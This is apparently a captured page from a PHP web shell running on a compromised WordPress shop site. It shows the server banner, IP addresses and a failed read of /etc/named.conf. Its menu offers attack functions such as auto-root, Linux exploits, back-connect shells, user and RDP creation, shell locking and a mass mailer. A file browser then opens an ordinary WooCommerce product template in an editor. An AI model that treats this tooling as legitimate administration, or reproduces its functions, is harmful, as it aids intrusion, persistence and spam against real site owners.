FreeBSD s15.mydevil.net 14.1-RELEASE-p4 FreeBSD 14.1-RELEASE-p4 #3 releng/14.1-n267709-86d01789bf41-dirty: Thu Sep 5 04:26:54 CEST 2024 root@pkg1.admin.net.pl:/usr/obj/usr/src/amd64.amd64/sys/devil amd64
Apache/N-G-I-N-X-htaccess-support
: 128.204.218.142 | : 18.227.134.251
Cant Read [ /etc/named.conf ]
?8.1.30
art
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
home /
art /
domains /
rotarycup.pl /
public_html /
wp-content /
themes /
sportcenter /
woocommerce /
[ HOME SHELL ]
Name
Size
Permission
Action
archive-product.php
3.21
KB
-rw-r--r--
single-product.php
2.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive-product.php
<?php /** * The Template for displaying product archives, including the main shop page which is a post type archive * * This template can be overridden by copying it to yourtheme/woocommerce/archive-product.php. * * HOWEVER, on occasion WooCommerce will need to update template files and you * (the theme developer) will need to copy the new files to your theme to * maintain compatibility. We try to do this as little as possible, but it does * happen. When this occurs the version of the template file will be bumped and * the readme will list any important changes. * * @see https://docs.woocommerce.com/document/template-structure/ * @author WooThemes * @package WooCommerce/Templates * @version 3.4.0 */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly $layout = get_post_meta(get_option('woocommerce_shop_page_id'),'page_sidebar_layout',true); if($layout==''){ $layout = ot_get_option('woocommerce_layout','right'); } get_header(); ?> <?php get_template_part( 'templates/header/header', 'heading' );?> <div id="body"> <div class="container"> <div class="content-pad-4x"> <div class="row"> <div id="content" class="<?php if($layout != 'full'){ ?> col-md-9 <?php }else{?> col-md-12 <?php } if($layout == 'left'){ ?> revert-layout <?php }?>" role="main"> <?php do_action( 'woocommerce_archive_description' ); ?> <?php if(class_exists('WCV_Vendor_Shop')){ WCV_Vendor_Shop::shop_description(); }?> <article class="single-page-content"> <?php if ( have_posts() ) { ?> <?php do_action( 'woocommerce_before_shop_loop' ); ?> <?php woocommerce_product_loop_start(); if ( wc_get_loop_prop( 'total' ) ) { while ( have_posts() ) { the_post(); /** * Hook: woocommerce_shop_loop. * * @hooked WC_Structured_Data::generate_product_data() - 10 */ do_action( 'woocommerce_shop_loop' ); wc_get_template_part( 'content', 'product' ); } } woocommerce_product_loop_end(); ?> <?php do_action( 'woocommerce_after_shop_loop' ); ?> <?php }else{ do_action( 'woocommerce_no_products_found' ); }?> </article> </div><!--/content--> <?php if($layout != 'full'){do_action( 'woocommerce_sidebar' );} ?> </div><!--/row--> </div><!--/content-pad-4x--> </div><!--/container--> </div><!--/body--> <?php get_footer(); ?>
Close